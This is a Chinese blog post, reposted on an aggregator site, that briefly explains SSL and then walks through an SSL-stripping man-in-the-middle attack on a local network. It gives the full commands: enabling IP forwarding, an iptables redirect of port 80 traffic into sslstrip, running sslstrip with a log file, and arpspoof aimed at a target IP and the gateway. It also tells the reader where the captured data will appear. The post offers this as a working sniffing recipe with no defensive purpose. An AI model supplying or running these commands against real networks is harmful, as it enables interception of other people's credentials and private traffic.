zoukankan      html  css  js  c++  java
  • HTTPS*嗅探

    两年前的文章,一直在本地笔记放着,发现博客上竟然没存。发出来。

    先说说什么是SSL:
        SSL是Secure Socket Layer的简称,中文意思是安全套接层,由NetScape公司开发,用来保障在Internet上的数据传输安全,确保数据在网络的传输过程中不被截取和窃听。被广泛用于Web浏览器与服务器之间的身份认证和数据加密传输。
    SSL协议提供的服务主要有:
    1.     认证用户和服务器,确保数据发送到正确的客户和服务器。
    2.     加密数据,防止中间人窃取。
    3.     维护数据的完整性,确保数据在传输过程中无法被改变。
    此次实验用到了两款工具,SSLstrip和Arpspoof。
    把网卡改成转发模式:
    echo '1' > /proc/sys/net/ipv4/ip_forward
    在iptables里添加规则,把所有http数据导入到sslstrip中。
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
    然后开启sslstrip:
    sslstrip -a -l <listenPort> -w XXX.log(保存的文件名)
    然后重新开一个终端,使用arpspoof进行网络欺骗:
    arpspoof -i eth0(你的网卡) -t 192.168.1.X(这个是你的目标IP) 192.168.1.1(这个是你的网关)
    然后一半在欺骗大概1分钟之后,你就能拦截到数据了。打开你的sslstrip的文件夹,里面有一个你设置的XXX.log文件,就是嗅探到的数据。
     
    注:嗅探时,sslstrip会报错,不用管它。如果没嗅探到数据,检查完步骤语法什么的没有出错后,可能是被拦截没有欺骗成功。
  • 相关阅读:
    THINKPHP导入全部post参数
    thinkphp 表单一些
    随机唯一不重复
    TP关联模型
    PHP函数之类
    MSSQLid清零
    httpwebrequest异步参考
    反射
    UrlOper
    工作周记
  • 原文地址:https://www.cnblogs.com/im404/p/4460678.html
Copyright © 2011-2022 走看看